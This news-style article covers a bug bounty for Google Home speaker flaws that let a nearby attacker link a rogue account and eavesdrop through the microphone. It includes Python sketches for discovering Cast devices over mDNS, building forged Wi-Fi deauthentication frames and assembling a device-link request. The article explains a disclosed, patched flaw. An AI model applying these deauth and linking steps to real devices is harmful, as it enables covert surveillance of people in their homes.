A Security Researcher Was Awarded $107,500 For Identifying Security Issues In Google Home Smart Speakers: A security researcher was awarded a $107,500 bug bounty for discovering security flaws in Google Home smart speakers that could be abused to install backdoors and turn the devices into wiretapping tools.
The flaws, according to the researcher who goes by the name Matt, “allowed an attacker within wireless proximity to install a ‘backdoor’ account on the device, enabling them to send commands to it remotely over the internet, access its microphone feed, and make arbitrary HTTP requests within the victim’s LAN.”
By sending such malicious requests, the attacker could not only learn the Wi-Fi password but also gain direct access to other devices on the same network. Google fixed the problems in April 2021, after the researcher responsibly disclosed them on January 8, 2021.
In a nutshell, the issue is that the Google Home software architecture allows a rogue Google user account to be linked to a target’s home automation device.
In a series of attacks described by the researcher, a threat actor wishing to eavesdrop on a victim can persuade them to install a malicious Android app, which, when it discovers a Google Home device on the network, sends covert HTTP requests to connect the attacker’s account to the victim’s device.
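The discovery step described above relies on the fact that Google Home speakers, like other Cast devices, announce themselves on the local network via multicast DNS under the `_googlecast._tcp.local` service name. As a minimal sketch (the wire format is standard DNS; nothing here is specific to the researcher's tooling), a malicious app could build an mDNS PTR query like this:

```python
import struct

def build_mdns_ptr_query(service: str) -> bytes:
    """Build a one-question mDNS PTR query for the given service name.

    Cast devices, Google Home speakers included, advertise themselves
    via multicast DNS under _googlecast._tcp.local, which is how an app
    on the same network can locate them.
    """
    # DNS header: ID=0, flags=0 (standard query), 1 question, 0 answers
    header = struct.pack("!HHHHHH", 0, 0, 1, 0, 0, 0)
    # Question name: each label is length-prefixed, terminated by a zero byte
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii")
        for label in service.split(".")
    ) + b"\x00"
    # QTYPE 12 = PTR, QCLASS 1 = IN
    question = qname + struct.pack("!HH", 12, 1)
    return header + question

query = build_mdns_ptr_query("_googlecast._tcp.local")
# Sending this packet to 224.0.0.251:5353 would solicit responses from
# any Cast-capable devices on the LAN (the network I/O is omitted here).
```

Once a device responds, the app knows its local IP address and can start sending it HTTP requests in the background, with no visible sign to the user.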
Going a step further, the researcher found that a Google Home device could be forced into “setup mode,” in which it creates its own open Wi-Fi network, by launching a Wi-Fi de-authentication attack that disconnects it from its home network.
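De-authentication works because, on networks without 802.11w protected management frames, deauth frames are unauthenticated: a nearby attacker can forge one that appears to come from the access point. A minimal sketch of the frame layout (the MAC addresses are hypothetical, and actually transmitting raw 802.11 frames requires a wireless card in monitor/injection mode, which is not shown):

```python
import struct

def build_deauth_frame(dest_mac: str, source_mac: str, bssid: str,
                       reason: int = 7) -> bytes:
    """Build a bare 802.11 deauthentication frame (management subtype 12).

    Because pre-802.11w networks do not authenticate management frames,
    a forged frame "from" the access point is enough to knock the
    target device off its Wi-Fi network.
    """
    def mac(addr: str) -> bytes:
        return bytes(int(octet, 16) for octet in addr.split(":"))

    frame_control = struct.pack("<H", 0x00C0)  # type 0 (mgmt), subtype 12 (deauth)
    duration = struct.pack("<H", 0)
    seq_ctrl = struct.pack("<H", 0)
    reason_code = struct.pack("<H", reason)    # 7 = class 3 frame from nonassociated STA
    return (frame_control + duration + mac(dest_mac) + mac(source_mac)
            + mac(bssid) + seq_ctrl + reason_code)

# Hypothetical addresses, for illustration only
frame = build_deauth_frame("aa:bb:cc:dd:ee:ff",   # victim device
                           "11:22:33:44:55:66",   # spoofed AP MAC
                           "11:22:33:44:55:66")   # BSSID
```

After enough of these frames, the speaker gives up on the network and falls back into setup mode.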
Google Home speakers allowed hackers to snoop on conversations – @billtoulas https://t.co/sugl8izVhz
— BleepingComputer (@BleepinComputer) December 29, 2022
The threat actor can then connect to the device’s setup network and request device information such as its name, cloud device ID, and certificate, which is exactly what they need to attach their account to the device.
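To make the flow concrete, the snippet below simulates the last step: pulling the three values from a device-info response and assembling a link request. The JSON field names and structure here are illustrative assumptions, not the exact schema of Google's local setup API or of the researcher's write-up:

```python
import json

# A simulated response from the device's local setup API while it is in
# setup mode; the field names are illustrative, not the real schema.
sample_response = json.dumps({
    "name": "Living Room speaker",
    "cloud_device_id": "ABCDEF1234567890",
    "certificate": "-----BEGIN CERTIFICATE-----\nMIIB...\n-----END CERTIFICATE-----",
})

info = json.loads(sample_response)

# These three values are what the attacker needs in order to issue a
# link request tying their own Google account to the victim's device.
link_request = {
    "device_name": info["name"],
    "device_id": info["cloud_device_id"],
    "device_cert": info["certificate"],
}
```

Because the setup network is open and the local API requires no authentication at this stage, nothing stops an attacker who is within Wi-Fi range from completing this exchange.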
Whichever attack sequence is used, a successful link procedure lets the adversary abuse Google Home routines to mute the device’s volume to zero and call an attacker-specified phone number at any moment, spying on the victim through the microphone.
The only thing the victim might notice is that the device’s LEDs change to solid blue, but Matt predicted they would simply assume that it was updating the firmware. There is no indication that the microphone is open during a call because the LEDs do not pulse as they usually do when the device is listening.
The attack can also be expanded to read files or add malicious modifications to the linked device that would take effect after a reboot, as well as make arbitrary HTTP requests within the victim’s network.
This is not the first time that attack techniques for covertly eavesdropping on potential targets through voice-activated gadgets have been devised.
A team of academics unveiled a method in November 2019 called “Light Commands,” which refers to a MEMS microphone flaw that enables attackers to remotely use light to inject invisible and inaudible commands into well-known voice assistants like Google Assistant, Amazon Alexa, Facebook Portal, and Apple Siri.